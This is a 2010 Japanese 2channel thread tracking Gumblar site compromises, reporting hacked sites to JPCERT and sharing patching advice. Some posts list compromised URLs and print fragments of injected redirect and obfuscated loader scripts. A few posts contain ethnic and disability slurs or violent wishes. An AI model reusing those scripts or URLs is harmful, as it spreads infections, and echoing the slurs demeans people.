10/06/02 21:33:50
>>423
アンインストール後にJREの残骸が残ることがあるかもしれないので
念のためにCCleanerでレジストリを調べておくといいかもしれないということ
443:名無しさん@お腹いっぱい。
10/06/02 22:35:24
>>412 404返すようになってきた
URLリンク(megalodon.jp)
Last-Modified: Wed, 06 Aug 2008 18:40:52 GMT
2008年に乗っ取られたのがガンブラーのおかげで発覚したのか
444:名無しさん@お腹いっぱい。
10/06/03 00:50:13
>>438
いつ踏んだんですか?とりあえず一週間ほど前に対策とられたみたいなので、
ここ数日の事であれば大丈夫ですよ。
445:名無しさん@お腹いっぱい。
10/06/03 04:53:57
>>412,429
www●mypersonalhttp●com:8080 ← ここに行って
goscanfor●com ←ここに飛ばされ
microsoft●msn●com●chimen●info ←ここでFakeAVの実演販売
Google先生も怒ってます
446:名無しさん@お腹いっぱい。
10/06/03 05:01:18
445です
gred先生は「このサイトは安全です」とな(ダメじゃん)
447:名無しさん@お腹いっぱい。
10/06/03 07:27:53
>>443
大元は[社団法人 情報通信設備協会]URLリンク(itca.or.jp)<) が URLリンク(tkanto.itca.or.jp) に転送される
URLリンク(www.google.com)
2年前からコメントスパム配信基地だった
448:447
10/06/03 07:40:47
×コメントスパム
○トラックバックスパム
449:名無しさん@お腹いっぱい。
10/06/03 08:40:58
>>442
げぇ……レジストリまで探らないといけないのか
そんなのここに初めて来たばかりのPCに疎い人とかにさせたら
重要なの消して悲惨な事になりそうだ
そこまで徹底的にしないと対策が不十分と言われるんじゃ
未だにガンブラー広がってるのも納得
広がってるスピードや広がってる対象(政府関連、ウェブ業者関連)がおかしいとは思うけど
450:名無しさん@お腹いっぱい。
10/06/03 10:03:19
>>440
ECCUBE.JPの訂正
URLリンク(megalodon.jp)
451:名無しさん@お腹いっぱい。
10/06/03 10:39:09
取扱注意
www●cowtv●jp/channel/student/index●php
452:名無しさん@お腹いっぱい。
10/06/03 11:19:37
www●odcc●jp
大阪デジタルコンテンツビジネス創出協議会
世界へ優れたコンテンツ…じゃなくてウィルス発信中
453:名無しさん@お腹いっぱい。
10/06/03 11:25:24
>>451 452
どちらもすごいですね 凸完
454:名無しさん@お腹いっぱい。
10/06/03 13:16:37
www●triskelionpublishing●net/
455:コテハン ◆8080adndqg
10/06/03 14:45:53
【陥落サイトのURL悪用厳禁】
www●ktm-ktm●com/tomoko ←途中切れ
www●w-ouen●com/i/machi ←未対応
www●kyotoclub-ilias●net/m/ ←電話用
www●triskelionpublishing●net/index●html ←途中切れ
www●giuglianoweb●com ←途中切れ
gpindy●com/ ←電話用
www●haisui●com/ec/html/
netgames●kirara●st/netgames
d07●mobair●info
www●suit-order●com ←絶賛放置中
park17●wakwak●com/~bayside/URANAI/R/ALLSITE/main●html
get-motorcycle●com/
【本日の(ry
infotop777●com/detail●php?id=style1198741395
↓ページ内の[Click Here!]を押した先↓
okuo2●cyberinfostation●jp/ ←\(^o^)/
456:名無しさん@お腹いっぱい。
10/06/03 16:16:14
netgames●kirara●st/netgames
d07●mobair●info
www●suit-order●com
park17●wakwak●com/~bayside/URANAI/R/ALLSITE/main●html
get-motorcycle●com/
infotop777●com/detail●php?id=style1198741395
okuo2●cyberinfostation●jp/
鯖屋とJPCERT連絡完了。
457:名無しさん@お腹いっぱい。
10/06/03 16:20:15
kanto●itca●or●jp/の「お問い合わせ」のドメインが
共有SSLだしGoogleにキャッシュされてるし、胡散臭い
URLリンク(www.google.com)
458:名無しさん@お腹いっぱい。
10/06/03 17:32:51
www●torihada●com
鳥肌実公式サイトが…
459:名無しさん@お腹いっぱい。
10/06/03 19:22:51
kanto●itca●or●jp/
社団法人情報通信設備協会 関東地方本部
知らせたのにお礼のメールもなし。告知もなし。
こんな団体がセキュリティを語るな!
また、ページのTopにゴルフコンペの案内ってどんな温い団体なんだよ。
蓮舫 次はここをバッサリ切ってくれ
460:名無しさん@お腹いっぱい。
10/06/03 19:42:53
>>459
そこ、さっき電凸しました
分かる者が不在だから明日掛け直してくれといってました
今日は無理なんじゃないの?
461:名無しさん@お腹いっぱい。
10/06/03 19:45:32
>>447 >>457 >>459
kanto●itca●or●jp/ はフィッシングサイトかも
462:名無しさん@お腹いっぱい。
10/06/03 20:33:54
↑ 修正済み??
463:名無しさん@お腹いっぱい。
10/06/03 21:07:14
>>462
>>443の時点で改竄されていたattachment/97/以下が404
Yahoo!のキャッシュにもガンブラーはないみたい
URLリンク(siteexplorer.search.yahoo.co.jp)
URLリンク(siteexplorer.search.yahoo.co.jp)
464:名無しさん@お腹いっぱい。
10/06/03 22:48:48
>>459
いったいどんなスクリプトが?
465:名無しさん@お腹いっぱい。
10/06/03 23:38:59
>>464
感染時のソースの魚拓。
URLリンク(megalodon.jp)
</head><body><script>~
飛び先が.com:8080。珍しくAVGが反応した
466:316
10/06/04 00:18:26
>>458
Last-Modified: Sat, 29 May 2010 14:27:16 GMT : URLリンク(megalodon.jp)
Last-Modified: Sat, 29 May 2010 14:27:33 GMT : URLリンク(megalodon.jp)
Last-Modified: Sat, 29 May 2010 14:27:24 GMT : URLリンク(megalodon.jp)
>>440
こんなんでいい?
467:名無しさん@お腹いっぱい。
10/06/04 10:15:30
>>463
乙です
468:名無しさん@お腹いっぱい。
10/06/04 10:43:39
mokunen●com
木質燃料だけに…
469:名無しさん@お腹いっぱい。
10/06/04 11:10:45
d-money●jp
470:名無しさん@お腹いっぱい。
10/06/04 11:47:10
>>458
>>468
IPA、JPCERTに報告しました
>>469
IPA、JPCERTに報告しました
Aviraに検体を提出、返事待ち
471:名無しさん@お腹いっぱい。
10/06/04 13:26:42
>>449
FFRWとかのレジストリ掃除ツール使えば手動で弄らなくてもそういう残骸はみんな消せるんだけどね
トラブルもほぼ起きない(RegSeekerみたいな漢専用ツールもあるから前評判は確かめた方がいいけど)
でも初心者じゃレジストリとか知らんだろうしな
俺は普通高校でhtml言語とかWordとかほんの少しやったけど
あんなもの教えるくらいならPCのセキュリティについて教えればいいのに
472:名無しさん@お腹いっぱい。
10/06/04 14:02:52
先生が教えられることは先生が説明できることだけだ
473:名無しさん@お腹いっぱい。
10/06/04 14:06:24
>>471
何歳だか知らんけど、既に教える内容は変わっていると思われ。
オッサンの俺はそもそも学校でPCなんか教わらなかった
(PC9801でDOSでパソコン通信の時代。当時の高校生は
友達とはポケベルでコミュニケーションしていた)。
数学や英語などと違って技術の進歩に合わせて頻繁に変わる
(変えざるを得ない)から、先生が大学で修得していなかったことを
教える羽目になってる(教科書棒読みの)数少ない教科なんじゃないかな。
474:名無しさん@お腹いっぱい。
10/06/04 14:56:57
adgaw●com/keyword/b/
475:名無しさん@お腹いっぱい。
10/06/04 15:33:14
五色温泉の抱えてた切符ってラトビア行きだっけ?
476:コテハン ◆8080adndqg
10/06/04 16:29:29
>>470 乙乙
【陥落サイトのURL悪用厳禁】
www●amakusaturigu●com/ ←絶賛放置中
www●kadaru●mydns●to/ ←相変わらず未対応(悪質)
↓↓↓↓↓
architects-egg●kadaru●mydns●to/ /(^o^)\
www●ad-jeaayf●com/links/
※※※アクセス注意!※※※
www●bestofunder●com/
↓
<script language="JavaScript">top.location = 'hURLリンク(antiviru)<)●ru/">
<center><a href="hURLリンク(antiviru)<)●ru/"> Click Here</a>
※最下部のGumblar.xはきっと無害
www●bestofunder●com/indexst●html ←これが本家かな?
477:名無しさん@お腹いっぱい。
10/06/04 16:50:24
少しは役に立つ機関… なのに知名度低いんだよな
URLリンク(www.ipa.go.jp)
478:316
10/06/04 18:09:26
>>280
Last-Modified: Fri, 04 Jun 2010 07:32:33 GMT
> 当財団ウェブサイトへのウィルス感染に関するお詫びとご報告
479:名無しさん@お腹いっぱい。
10/06/04 20:54:44
PUA.HTML.Infected.WebPage-2
これもこのウイルスの検出名でおk?
480:名無しさん@お腹いっぱい。
10/06/04 21:36:24
それを確認してどうするのかと
481:名無しさん@お腹いっぱい。
10/06/04 21:44:54
>>480
常駐以外のを使ってこれを検出した
スプリクトに反応しただけなら問題ないから確認したかったが、スレチだったな
482:名無しさん@お腹いっぱい。
10/06/04 22:07:38
ブラウザキャッシュなら名前より検出場所でわかるんじゃないの
483:名無しさん@お腹いっぱい。
10/06/04 22:15:27
>>482
場所見る前にブルスクった
まあ大丈夫だろうし、ありがとう
484:名無しさん@お腹いっぱい。
10/06/04 22:17:47
どういうエラーで落ちたのかにもよるけどそれは問題あるとおもいます
485:444
10/06/04 22:41:43
>>466
どもです
関連リンク
[いま一番危ないぜい弱性は何だ? - 今週のSecurity Check:ITpro]
URLリンク(itpro.nikkeibp.co.jp)
Java(JRA) 38%
Adobe Reader/Acrobat 36%
MDAC (UpdateしてないExcel)19%
[本当の攻撃はこれから? Gumblarが怖い本当の理由 - TechTargetジャパン 情報セキュリティ]
URLリンク(techtarget.itmedia.co.jp)
(要会員登録or[-CmsMembersControl])
「Gumblar(ガンブラー)の攻撃モデルは、近年まれに見る成功例」鵜飼裕司
2010.03.25と古いですが
最近見て、改竄された不名誉は甘んじて受ける姿勢が好感したので↓
[音素材サイト『ザ・マッチメイカァズ』閉鎖の危機?! 管理人が語る“ガンブラー”の脅威- ガジェット通信]
URLリンク(getnews.jp)
486:名無しさん@お腹いっぱい。
10/06/04 22:45:16
>>484 どういうエラーで
Dr.webの異常終了で、既知の問題だからおk
part4からの住人で対策はとっくにやってある
487:485
10/06/04 22:45:23
444じゃなくて440でしたごめんなさい
488:486
10/06/04 22:46:35
あ、part5だた
489:456
10/06/05 03:16:56
park17●wakwak●com/~bayside/URANAI/R/ALLSITE/main●html
封鎖確認
wakwak案外はやいww
490:名無しさん@お腹いっぱい。
10/06/05 09:02:43
僕はちょうせんじん知的障害者です
魚醤系316系の僕のちょうせんじん知的障害者まとめです
322 :316:2010/05/30(日) 03:42:15 ←なまえ316系 え?何これ怖いです。。。
324 :315:2010/05/30(日) 08:32:37 ←なまえ316系さん?315?え?自分にお返事 何これ怖いです。。。
315
378 :316:2010/06/01(火) 01:43:29 ←魚醤? え?魚醤てなんですか? あぁー。。。怖いです。。。(魚醤系)
>>375
あぁー。。。
>>280のアドレスで具具れば魚醤~
419 :名無しさん@お腹いっぱい。:2010/06/02(水) 17:59:37 ←あ!魚拓になりました!よかったのであつた!
>>416
今回は魚拓をとってから電凸したのであつた
同人の魚拓好き腐まんこさん?あほ(ry
__、、=--、、 __
/ ・ ゙! /・ `ヽ
| ・ __,ノ (_ ・ |
ヽ、 (三,、, _) / 僕あほ ちゃうどー 電凸すきやねん電凸て何?
/ー-=-i'’ (____,,,.ノ
|__,,/ |__ゝ ← 新型Gumblar>316型 魚醤系 ボンクラ腐まんこ(推定)
〉 ) ( )
↑
ぼくは知能指数?12です僕です(ry
491:名無しさん@お腹いっぱい。
10/06/05 12:07:31
にほんごでおk
492:名無しさん@お腹いっぱい。
10/06/05 14:58:03
>>491
反応しちゃダメだ。
華麗にスールだぞ
493:名無しさん@お腹いっぱい。
10/06/05 16:01:19
>>476
www●amakusaturigu●com :Forbidden
www●bestofunder●com :Gredで「Misleading Application (BW017B)」
後は変化なし
494:コテハン ◆8080adndqg
10/06/05 16:36:21
■ホームページ更新代行
www●7500zei●com/ ←既に修正済
※ソースの最下部に8080の痕跡
<!--d2392c04537c5eaf61fe86d1998535a1-->
↓びんぐがコードを捕捉(きゃっしゅ)してた↓
cc●bingj●com/cache●aspx?q=site%3awww●7500zei●com%2f&d=4616900965040755&mkt=ja-JP&setlang=ja-JP&w=db69f17b,70c28a29
495:名無しさん@お腹いっぱい。
10/06/05 17:01:40
今日windows defenderでスキャンしたら
何か検出されたので検索したらどうやら
ガンブラー系っぽいものだった。
ガンブラー対策はこまめにしてた。
削除しようとしたら
再起動を促されて再起動したけど
セーフモードですら起動せず・・・・
泣く泣くクリーンインストールしました。
何かこれまでの対策が効かない
新型亜種でも出回っているのですか?
496:名無しさん@お腹いっぱい。
10/06/05 17:27:15
>>496
何を根拠にガンブラー言うのかわからんのだが・・・
>>4は8080系用の対策方法だから、違う系統の改竄に対しては効果が無い場合がある。
Gumblar(ガンブラー)=サイト改竄の総称と決め付けてしまった
某セキュリティソフトベンダーと、それをそのまま報道したマスゴミの罪は大きい
497:496
10/06/05 17:29:18
安価まちがえたorz
>>496→>>495
498:名無しさん@お腹いっぱい。
10/06/05 17:30:51
>>495
検出ウイルス名は?
499:名無しさん@お腹いっぱい。
10/06/05 17:40:07
>>495 です。
ウイルス名はそもそもクリーンインストールしてしまったので
わからなくなってしまったんだけど、「downloader」みたいな単語があった
気がします。
検出されたウイルス名をググッたら完全にHITはしなかったんだけど
同じようなウィルス名のものがどうやらガンブラー系とのことでした。
ちなみにOSはXP SP3 でウイルス対策ソフトはAVAST5free、
火壁は PC TOOLS、ブラウザはIE7です。
アップデートとかこまめにやってましたが・・・
ほぼ毎日スキャンはしてました。
ちなみに今回のウイルスを検出したのは
windows defender でした。
500:名無しさん@お腹いっぱい。
10/06/05 17:58:47
>>499
windows defenderでウイルスって検出するの?
downloaderこれだけじゃなんともいえん
他にもたくさんある
501:名無しさん@お腹いっぱい。
10/06/05 18:06:30
こまめにアップデートしながらIE7?
何か色々穴がありそうな人だな
502:名無しさん@お腹いっぱい。
10/06/05 18:10:35
>>499
IE7の時点でこまめにやってるとは言えない
503:名無しさん@お腹いっぱい。
10/06/05 18:17:27
ゼロデイのAdobeにまたまたゼロデイw
URLリンク(www.adobe.com)
504:名無しさん@お腹いっぱい。
10/06/05 18:29:23
>>499 です。
>>501-502
IE8は個人的な事情があって使ってませんでした。
今回はもう素直にIE8にしました。
>>500
毎日(平日)AVASTでスキャンしてたのですが
毎週末にdefenderでもスキャンします。
今回なぜかスパイウェアとして検出されました。
ウイルス名はやっぱり思い出せません。
ちなみにアングラなサイトには行かない程度に
ネットサーフィンする程度ですが・・・
505:名無しさん@お腹いっぱい。
10/06/05 18:33:33
この一連のウイルスの場合、アングラも非アングラも関係無いってことが判ってない時点で(ry
506:名無しさん@お腹いっぱい。
10/06/05 18:52:13
>>505
すいません。
それくらいは知っていましたが、
(大手企業のサイトも改ざんされた等)
当方それほどPCに関するスキルがないので
何とかそれなりに情報収集して対応してきた
つもりです。
でも結局やられてしまったので
ちょっと悔しくてここで愚痴っただけです。
周辺機器のドライバのインストールや
年賀状の住所録を作り直すのが
めんどくさいですね。
残りの作業も今からがんばります。
507:名無しさん@お腹いっぱい。
10/06/05 18:52:22
まぁPC初心者じゃあ解らなくてもしょうがないだろ
おまけに初心者スレにこの類を扱うスレは存在しないからここにすがるしかない
508:名無しさん@お腹いっぱい。
10/06/05 19:18:36
ここもテンプレが改竄されてる時点で
509:名無しさん@お腹いっぱい。
10/06/05 19:31:00
>ちょっと悔しくてここで愚痴っただけです。
見事な開き直りですね
510:名無しさん@お腹いっぱい。
10/06/05 21:24:05
>>506
いくつかレスキューディスクが提供されてるので試して欲しかったですね
■ノートン レスキュー ツール
URLリンク(security.symantec.com)
■Dr.Web LiveCD
URLリンク(drweb.jp)
駆除できなくても住所録の救出くらいできたはず
■WinPE
URLリンク(lets-go.hp.infoseek.co.jp)
511:名無しさん@お腹いっぱい。
10/06/05 23:38:06
>>504
IEはデフォルトの設定だと穴が多いから
Firefox+NoScript+AdblockPlus
この組み合わせを推奨する
NoScript→<IFRAME>禁止にチェックを入れる
AdblockPlus→|URLリンク(*:8080*) をブロック
512:名無しさん@お腹いっぱい。
10/06/05 23:46:35
ほーらまたアンチFx厨が来まちゅよ~
513:名無しさん@お腹いっぱい。
10/06/06 02:09:59
FirewallやProxomitronやHIPS/IDSで遮断検知ルール作って
PC内全てのブラウザに適用出きるようにすればええがな
514:名無しさん@お腹いっぱい。
10/06/06 02:43:38
そんなスキル持ち合わせておらぬ!(キリッ
515:名無しさん@お腹いっぱい。
10/06/06 03:08:12
>>511
糞企業のザルPCには激しくオススメしたい組み合わせ
516:名無しさん@お腹いっぱい。
10/06/06 04:43:29
Flash Player, Adobe Reader and Acrobat に致命的脆弱性だってよ。
攻略コードも既に出回ってるって。
517:名無しさん@お腹いっぱい。
10/06/06 05:02:54
現時点での対策がFlash 10.1 RCにしろってのが最悪だよな。
あれはあれでクラッシュするサイトがあったりしてまだまだ不安定な代物なのに。
518:名無しさん@お腹いっぱい。
10/06/06 05:31:38
フラッシュプレイヤーとか競争相手が居ないからノンビリしてるんだろうなアドビ
のんびりし過ぎてユーザーから反感を買ってるのも知らずに・・・
519:名無しさん@お腹いっぱい。
10/06/06 06:55:03
HTML5だっけかに穴とか無ければそっちに移行してもらいたいもんだ
520:名無しさん@お腹いっぱい。
10/06/06 09:02:26
>>511
Vista以降のOSとIE8以降の組み合わせで使える保護モード使えよ
そうすりゃfirefoxより安全だろ
ChromeのWindows版や、IE8以降+Vista以降は、ブラウザの主要部分を限定された権限で動かして、
ブラウザがセキュリティーホールでやられても影響が限定されるようになってる
firefoxは全部標準の権限で動いてるから、ブラウザがセキュリティーホールでやられるとまともに影響をうける
521:名無しさん@お腹いっぱい。
10/06/06 13:46:49
ここのアクセスしたらavastがトロイを発見しましたといいます
www●pacs●co.jp/pacs/hist_walk/walk_miyagi04/senwaka_saisyou_temp/
aguseとgredでチェックしても、安全としか出ないのですが
誤検出なんでしょうか?
522:名無しさん@お腹いっぱい。
10/06/06 13:55:31
>>521
どんなトロイ?
523:名無しさん@お腹いっぱい。
10/06/06 15:38:56
URLリンク(www)●pacs●co●jp/pacs/hist_walk/walk_miyagi04/senwaka_saisyou_temp/pacs_pr/qqpr●php?d=sponser/&i=10&a=R&c=RV&w=550&h=50
ここに仕込まれてる
<script language=JavaScript>eval(unescape('var%20codelock_bas~~
524:名無しさん@お腹いっぱい。
10/06/06 16:04:15
火狐マンスェーーーーー(棒)
525:名無しさん@お腹いっぱい。
10/06/06 16:04:17
home●e-catv●ne●jp/jun/
526:名無しさん@お腹いっぱい。
10/06/06 16:12:21
>>525
どこにあるの?
527:名無しさん@お腹いっぱい。
10/06/06 16:59:13
dotetin●sakura●ne●jp/
blaugrana●sakura●ne●jp/
528:名無しさん@お腹いっぱい。
10/06/06 17:49:52
>>523
難読化されてるけど
バナーの画像を入れ替えてるだけじゃないの?
529:名無しさん@お腹いっぱい。
10/06/06 18:08:49
mqpws428●sakura●ne●jp/index7●html
具体的には分かりませんが
らしき物が見受けられます
いかがでしょうか?
530:名無しさん@お腹いっぱい。
10/06/06 18:13:08
ここは鑑定スレじゃねぇよ
531:名無しさん@お腹いっぱい。
10/06/06 18:49:16
www●bestofunder●comが強烈でワロタww
532:名無しさん@お腹いっぱい。
10/06/06 19:11:35
アドビはなんでここまでやる気ないの
ソフトは穴だらけだわバージョン更新を餌にgetplusとか怪しげなもん植えつけようとするわ
533:名無しさん@お腹いっぱい。
10/06/06 19:49:44
>>531
URLリンク(megalodon.jp)
再感染で.htaccess改竄?
URLリンク(www.dan.co.uk)●bestofunder●com/
xxxx.ruに飛ばされるから怪しいけど
ここにリンクあるから川島って人が管理してるサイトらしい
URLリンク(0000181856.seesaa.net)
534:名無しさん@お腹いっぱい。
10/06/06 20:49:34
>>529
Index丸見えで、非公開のつもりのファイルが感染してます
image/sample/sample/index6.html
怪しげな情報商材も公開中です
535:名無しさん@お腹いっぱい。
10/06/06 21:45:09
最近のGumblarはスタートアップやタスマネのプロセスでも感染の有無が分からないのかねえ
>>3-6の対策、こまめな定義更新・ウイルススキャンを地道にしていくしかないか
536:名無しさん@お腹いっぱい。
10/06/06 21:50:21
>>535
お前のアンカーがヤバイ
537:名無しさん@お腹いっぱい。
10/06/06 21:54:48
>>353
氏ね
何考えてるんだ
538:537
10/06/06 21:55:34
×>>353
○>>535
539:名無しさん@お腹いっぱい。
10/06/06 22:06:12
馬鹿にしろ故意にしろ悪質
540:名無しさん@お腹いっぱい。
10/06/06 22:08:54
リンクからブラウザ起動しないように専ブラの設定変えとけば?
541:535
10/06/06 22:14:48
変なURLのやつはもちろん省くさ
> 使用していないものはアンインストール推奨です
>
> ■ Windows XPは可能ならば新しいOSに
> ■ Windows Update / Microsoft Updateを更新
> ・XP以下は念のためMicrosoft Updateに変更してアップデートする
> ■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
> URLリンク(get.adobe.com)
> ・インストール後本体をアップデート
> ヘルプ → アップデートの有無をチェック
> ・Acrobat Javascriptをオフにする
> 編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
> ■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
> URLリンク(get.adobe.com)
> URLリンク(www.adobe.com)
> ・Flash Playerのバージョン確認
> URLリンク(www.adobe.com)
> URLリンク(www.adobe.com)
> ■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
> URLリンク(www.adobe.com)
> ■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
> URLリンク(www.java.com)
> ・Javaのバージョン確認
> URLリンク(www.java.com)
> ■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
> URLリンク(www.apple.com)
> ■ RealPlayerを更新 (使っていないならアンインストール)
> URLリンク(jp.real.com)
ここだけ重点にして
542:名無しさん@お腹いっぱい。
10/06/06 22:16:14
QuickTimeやRealPlayer無しで思う存分動画見られるプレイヤーがあればなあ
543:名無しさん@お腹いっぱい。
10/06/06 22:17:10
>>540
自分が踏んじゃうからこわーい><
って言ってんじゃねえよ
544:名無しさん@お腹いっぱい。
10/06/06 22:19:42
>>541 お前の理解度なんかどうでもいい
545:名無しさん@お腹いっぱい。
10/06/06 22:34:47
スタートアップの製造元、コマンド、場所項目
タスマネプロセスの説明項目
このあたりに不明とか書いてたら怪しいと思っていいのかな
546:名無しさん@お腹いっぱい。
10/06/06 23:01:02
>>521
たぶん誤検知
いかにもな難読化コードなので誤判定されるのも無理ないけど
547:名無しさん@お腹いっぱい。
10/06/06 23:05:22
>>531,533
ちょっとまさぐってみたら
XXXXXXX●ru/skank/index●php?page=3d-anime-hentai-videos
3Dアニメ変態ビデヲwwwww
※何が落ちてくるかは知らん
548:547
10/06/06 23:21:51
ちょっと追記
アクセスする毎に飛ばされる先が違う
thermalvisit●ru
awmmagazine●ru
visitthermal●ru
他にもあるかもしれん
549:名無しさん@お腹いっぱい。
10/06/07 11:35:56
>>546
Avira「HTML/Crypted.Gen」
Avast「JS:Redirector-CE [Trj] 」
Dr.Web「Trojan.MulDrop.1010」
550:名無しさん@お腹いっぱい。
10/06/07 14:26:36
535はうっかりクリックしたらどうすんだよw
551:コテハン ◆8080adndqg
10/06/07 14:34:05
【陥落サイトのURL悪用厳禁】
www●gal-love●com/
katusika●net/
d-pic●net/repo/ ←トップページ以外は相変わらず絶賛放置中
www●bbfactory●jp/
dental-mos●net/ap/14/4/
cre2cash●f01●jp/ ←<!--カス対応中w-->
www●ad-jeaayf●com/links/
www12●plala●or●jp/atakashi/sk/
elyess●hotel-prony-elysees-paris●com/ao/5/3/index●html
552:名無しさん@お腹いっぱい。
10/06/07 16:08:52
なんかめっちゃ増えてるんですけどorz
553:名無しさん@お腹いっぱい。
10/06/07 17:27:12
【悪用厳禁】
URLリンク(www)<)●haisui●com/
URLリンク(webright)<)●vaxponys●com/
JRCERTに報告しました
>>551
JPCERTに報告しました
554:名無しさん@お腹いっぱい。
10/06/07 17:28:02
http削り忘れた…
555:名無しさん@お腹いっぱい。
10/06/07 17:32:09
報告してくれるだけで十分ありがたい
次からは気をつけてね
556:名無しさん@お腹いっぱい。
10/06/07 17:44:09
Flash Player、Adobe Reader/Acrobatに新たな脆弱性、既に悪用も
URLリンク(internet.watch.impress.co.jp)
557:名無しさん@お腹いっぱい。
10/06/07 17:48:26
マジかよ
動画サイト見るのも命がけの時代か
558:名無しさん@お腹いっぱい。
10/06/07 17:53:24
俺はずっと10.1RCを使ってたから
たまたま運良く被害をまぬがれていただけらしい
559:コテハン ◆8080adndqg
10/06/07 18:09:37
>>553 乙です
過去に陥落履歴があった(ような気がする)vaxponys●comを掘ってみた・・・
【陥落サイトのURL悪用厳禁】
best-shoper●vaxponys●com/
dream-girls●vaxponys●com/
diet-mates●vaxponys●com/
rocken-house●vaxponys●com/
german-house●vaxponys●com/
rice-premium123●vaxponys●com/
wine-house●vaxponys●com/
premium-farmer●vaxponys●com/
dyson-good●vaxponys●com/
kayak-house●vaxponys●com/
event-mate●vaxponys●com/
natural-warm●vaxponys●com/
rooms-sayaka●vaxponys●com/
祝!\(^o^)/全滅
※他にもあるかも・・・
560:コテハン ◆8080adndqg
10/06/07 18:16:18
追記
■セーフ ブラウジング
vaxponys●com の診断ページ
www●google●com/safebrowsing/diagnostic?site=vaxponys●com/&hl=ja
>過去 90 日間に、このサイトの一部で不審な動きが 2 回報告されています。
>不正なソフトウェアは vaxponys●sakura●ne●jp/, supernewstuff●ru/ を含む 2 個のドメインでホストされています。
>vaxponys●sakura●ne●jp/
(;゚д゚)・・・
561:名無しさん@お腹いっぱい。
10/06/07 18:25:13
新型ってないの?
ここで報告されているのは殆どavast!で検出できるし
562:名無しさん@お腹いっぱい。
10/06/07 18:36:58
>>535のアンカーは何で危険なんだ?
専ブラでカーソルを合わせるだけなら問題ないのでは?
563:名無しさん@お腹いっぱい。
10/06/07 18:42:42
>>562
迷い込んだ初心者が信用して上から順に素直に何も疑わずクリックすることが想像される
住人の心配は全くしていない
564:名無しさん@お腹いっぱい。
10/06/07 19:03:57 BE:1365451283-PLT(19650)
>>561
Katesリバースエンジニアリングされて中身暴露されたからじゃない?
565:名無しさん@お腹いっぱい。
10/06/07 19:24:33
www.tu-han4.com/hatumo/
566:名無しさん@お腹いっぱい。
10/06/07 19:50:31
>>559
>>560
「vaxponys●sakura●ne●jp」をさくらに通報しました
>>561
取りこぼした検体を提出して検出率100%を目指すというのはどうか
>>565
>>368の時点でJRCERTに提出したんですけど、まだダメですか
もう一回通報しとこうかなあ…
567:名無しさん@お腹いっぱい。
10/06/07 22:46:06
このスレの存在自体危険だよな
568:名無しさん@お腹いっぱい。
10/06/07 22:51:14
>>567
罠リンクを罠リンクと見抜ける人間でないと(2chを使う事は)難しい
569:名無しさん@お腹いっぱい。
10/06/07 22:52:36
Silverlightってどうなの?
脆弱性報告されてたりする?
セキュリティ的にFlashよりいいのなら
ようつべも使えばいいのにと思うのだが
570:名無しさん@お腹いっぱい。
10/06/07 23:01:33
今はレジストリでしか感染確認出来ない?
571:名無しさん@お腹いっぱい。
10/06/07 23:26:52
>>567
このスレがあるから日本でのパンデミックが抑えられてるとも言える。
細々した陥落サイトを閉鎖・修正・消滅に追い込んでる人達に感謝しろよ。
572:名無しさん@お腹いっぱい。
10/06/07 23:28:45
>>570
最近出てるのは確認のしようがないらしい
駆除法もクリーンインストール(普通のウイルスやマルウェアならそこまで行きつかない最終手段)しかないって有様だしな
マスゴミや政府がザルなせいで被害は広がる一方
573:名無しさん@お腹いっぱい。
10/06/07 23:52:52
>>572
FTP以外のメール等のアカウントも抜かれるなら
迷惑メールがいっぱいくるのかな
574:名無しさん@お腹いっぱい。
10/06/07 23:55:15
確認のしようがないってことはavastでスキャンとかしてウイルスなしでも
感染してるかもしれないってことですか?
575:名無しさん@お腹いっぱい。
10/06/07 23:57:51
>>573
迷惑メールは受信だけでなく送信もありえる
それによってフリーメールアカウントなら停止させられるかもしれない
576:名無しさん@お腹いっぱい。
10/06/07 23:58:48
>>574
感染後にDLする何らかのウイルスを検出する可能性が高い
偽セキュリティソフトなんかがその典型
577:名無しさん@お腹いっぱい。
10/06/08 00:04:02
なんでこれだけ被害出てるのに、firefoxとかセキュリティーの低いブラウザ使い続けるのかわからん
IE8/9+Vista/7で保護モード使うか、ChromeのWindows版使うかすればいいのに
いまだにセキュリティー対策にIEからfirefoxにかえろとか大嘘おしえてGumblarとかに引っかかるユーザーを
量産してるアホはいますぐ腹を切るべし
578:名無しさん@お腹いっぱい。
10/06/08 00:05:56
XPなので保護モードありません><
CPUがPenIIIなのでDEPもありません><
579:名無しさん@お腹いっぱい。
10/06/08 00:09:27
>>573
アカウントと言えばYouTube、ニコ動のやつも何か利用されるのだろうか
著作物とかが勝手に違法アップロードされるとか
580:名無しさん@お腹いっぱい。
10/06/08 00:30:38
それよりもGumblar作ったやつをさっさと捕まえるなり殺害するなりしろよ
ここまでやっておいて死刑ですら生温いわ
581:名無しさん@お腹いっぱい。
10/06/08 00:30:51
firefoxで感染なんかしたことないな
script切ってない本人の問題
IEでないと見れないどこかのキムチ国ブラウザなんかいらないからw
582:名無しさん@お腹いっぱい。
10/06/08 00:31:08
テキストウラウザ最強だな
583:名無しさん@お腹いっぱい。
10/06/08 00:32:22
Windows捨てればええねん
LinuxやMacOSへGO!
584:名無しさん@お腹いっぱい。
10/06/08 00:34:43
どのブラウザなら大丈夫なんてないだろ常識的に考えて
それよりしっかりパッチ当てるなりサードパーティ製品のアップデートしろ
585:名無しさん@お腹いっぱい。
10/06/08 00:43:11
そういえばGumblarにたいしてHIPSは有効なのかね
ゼロディされたらこれが唯一の防御壁だろ
586:名無しさん@お腹いっぱい。
10/06/08 00:50:44
HIPSは有効だろうね
ドライブバイダウンロードやおかしな通信を防げる
ただし、最初に感染した時に何されたかはわからないけど
587:名無しさん@お腹いっぱい。
10/06/08 01:15:20
FirefoxにSnortライクなアドオンのFirekeeperがお手軽か
url_content, headers_content, body_contentやurl_re, headers_re, body_reで
拒否許可やアラートのルール作れるらしいから
588:名無しさん@お腹いっぱい。
10/06/08 01:28:23
最近のトレンドは、「やられても安心」っていう方向だからな
ところがfirefoxは設計が古臭く、やられにくいようにできるけど、やられたらダメっていうあいかわらずの旧タイプだな
IEやChromeは、やられても安心っていう方向に進化した
589:名無しさん@お腹いっぱい。
10/06/08 01:36:17
情報ダダ漏れのブラウザなんかいらない
590:名無しさん@お腹いっぱい。
10/06/08 03:08:26
